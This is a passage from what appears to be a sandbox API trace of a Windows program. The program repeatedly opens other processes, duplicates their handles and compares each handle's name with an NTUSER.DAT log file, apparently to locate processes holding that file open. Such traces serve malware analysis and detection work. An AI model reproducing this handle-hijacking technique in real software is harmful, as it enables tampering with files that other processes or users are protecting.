bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.516] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.517] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.517] CloseHandle (hObject=0x1e4) returned 1 [0163.517] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.517] CloseHandle (hObject=0x194) returned 1 [0163.517] CloseHandle (hObject=0x1e8) returned 1 [0163.517] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0163.517] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.518] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.519] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.519] CloseHandle (hObject=0x1e4) returned 1 [0163.519] CloseHandle (hObject=0x194) returned 1 [0163.519] CloseHandle (hObject=0x1e8) returned 1 [0163.519] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0163.519] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.519] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.520] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.521] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.521] CloseHandle (hObject=0x1e4) returned 1 [0163.521] CloseHandle (hObject=0x194) returned 1 [0163.521] CloseHandle (hObject=0x1e8) returned 1 [0163.521] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0163.521] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.521] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.521] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.522] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.522] CloseHandle (hObject=0x1e4) returned 1 [0163.522] CloseHandle (hObject=0x194) returned 1 [0163.523] CloseHandle (hObject=0x1e8) returned 1 [0163.523] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0163.523] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.523] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.523] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.524] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.524] CloseHandle (hObject=0x1e4) returned 1 [0163.525] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.525] CloseHandle (hObject=0x194) returned 1 [0163.525] CloseHandle (hObject=0x1e8) returned 1 [0163.525] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0163.525] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.526] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.526] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.526] CloseHandle (hObject=0x1e4) returned 1 [0163.526] CloseHandle (hObject=0x194) returned 1 [0163.527] CloseHandle (hObject=0x1e8) returned 1 [0163.527] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0163.527] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.527] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.527] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.528] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.528] CloseHandle (hObject=0x1e4) returned 1 [0163.528] CloseHandle (hObject=0x194) returned 1 [0163.528] CloseHandle (hObject=0x1e8) returned 1 [0163.528] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.529] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.529] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.530] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.530] CloseHandle (hObject=0x1e4) returned 1 [0163.530] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.530] CloseHandle (hObject=0x194) returned 1 [0163.530] CloseHandle (hObject=0x1e8) returned 1 [0163.530] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.531] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.531] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.531] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.532] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.532] CloseHandle (hObject=0x1e4) returned 1 [0163.532] CloseHandle (hObject=0x194) returned 1 [0163.532] CloseHandle (hObject=0x1e8) returned 1 [0163.532] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.532] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.532] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.533] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.534] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.534] CloseHandle (hObject=0x1e4) returned 1 [0163.534] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0163.534] CloseHandle (hObject=0x194) returned 1 [0163.534] CloseHandle (hObject=0x1e8) returned 1 [0163.534] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.535] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.535] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.535] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.536] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.536] CloseHandle (hObject=0x1e4) returned 1 [0163.536] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0163.536] CloseHandle (hObject=0x194) returned 1 [0163.536] CloseHandle (hObject=0x1e8) returned 1 [0163.537] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.537] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.537] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.537] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.538] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.538] CloseHandle (hObject=0x1e4) returned 1 [0163.538] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.538] CloseHandle (hObject=0x194) returned 1 [0163.538] CloseHandle (hObject=0x1e8) returned 1 [0163.538] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.538] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.539] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.540] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.540] CloseHandle (hObject=0x1e4) returned 1 [0163.540] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -3 [0163.540] CloseHandle (hObject=0x194) returned 1 [0163.540] CloseHandle (hObject=0x1e8) returned 1 [0163.540] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.540] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.541] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.542] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.542] CloseHandle (hObject=0x1e4) returned 1 [0163.542] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.542] CloseHandle (hObject=0x194) returned 1 [0163.543] CloseHandle (hObject=0x1e8) returned 1 [0163.543] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.543] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.544] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.545] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.545] CloseHandle (hObject=0x1e4) returned 1 [0163.545] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0163.545] CloseHandle (hObject=0x194) returned 1 [0163.545] CloseHandle (hObject=0x1e8) returned 1 [0163.545] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.545] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.546] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.547] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.547] CloseHandle (hObject=0x1e4) returned 1 [0163.547] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 9 [0163.547] CloseHandle (hObject=0x194) returned 1 [0163.547] CloseHandle (hObject=0x1e8) returned 1 [0163.547] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.547] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.547] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.548] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.548] CloseHandle (hObject=0x1e4) returned 1 [0163.548] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 4 [0163.548] CloseHandle (hObject=0x194) returned 1 [0163.548] CloseHandle (hObject=0x1e8) returned 1 [0163.548] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.549] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.549] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.550] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.550] CloseHandle (hObject=0x1e4) returned 1 [0163.550] _wcsicmp (_Str1="\\sql96F1.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.550] CloseHandle (hObject=0x194) returned 1 [0163.550] CloseHandle (hObject=0x1e8) returned 1 [0163.551] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0163.551] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.551] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.552] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.552] CloseHandle (hObject=0x1e4) returned 1 [0163.552] _wcsicmp (_Str1="\\sql9702.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.552] CloseHandle (hObject=0x194) returned 1 [0163.552] CloseHandle (hObject=0x1e8) returned 1 [0163.552] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0163.552] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.552] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.553] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.554] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.554] CloseHandle (hObject=0x1e4) returned 1 [0163.554] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.554] CloseHandle (hObject=0x194) returned 1 [0163.554] CloseHandle (hObject=0x1e8) returned 1 [0163.554] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0163.554] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.554] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.555] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.556] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.556] CloseHandle (hObject=0x1e4) returned 1 [0163.556] CloseHandle (hObject=0x194) returned 1 [0163.556] CloseHandle (hObject=0x1e8) returned 1 [0163.556] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0163.556] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.557] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.557] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.557] CloseHandle (hObject=0x1e4) returned 1 [0163.558] _wcsicmp (_Str1="\\EQUATION", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -9 [0163.558] CloseHandle (hObject=0x194) returned 1 [0163.558] CloseHandle (hObject=0x1e8) returned 1 [0163.558] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0163.558] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xfc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.558] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.558] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.559] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.559] CloseHandle (hObject=0x1e4) returned 1 [0163.559] _wcsicmp (_Str1="\\Fonts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -8 [0163.559] CloseHandle (hObject=0x194) returned 1 [0163.560] CloseHandle (hObject=0x1e8) returned 1 [0163.560] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0163.560] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.560] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.560] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.561] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.561] CloseHandle (hObject=0x1e4) returned 1 [0163.561] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0163.561] CloseHandle (hObject=0x194) returned 1 [0163.561] CloseHandle (hObject=0x1e8) returned 1 [0163.561] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0163.561] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.561] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.562] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.563] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.563] CloseHandle (hObject=0x1e4) returned 1 [0163.563] CloseHandle (hObject=0x194) returned 1 [0163.563] CloseHandle (hObject=0x1e8) returned 1 [0163.563] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0163.563] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.563] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0163.564] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0163.565] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0163.565] CloseHandle (hObject=0x1e4) returned 1 [0163.565] CloseHandle (hObject=0x194) returned 1 [0163.565] CloseHandle (hObject=0x1e8) returned 1 [0163.565] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0163.565] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0163.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 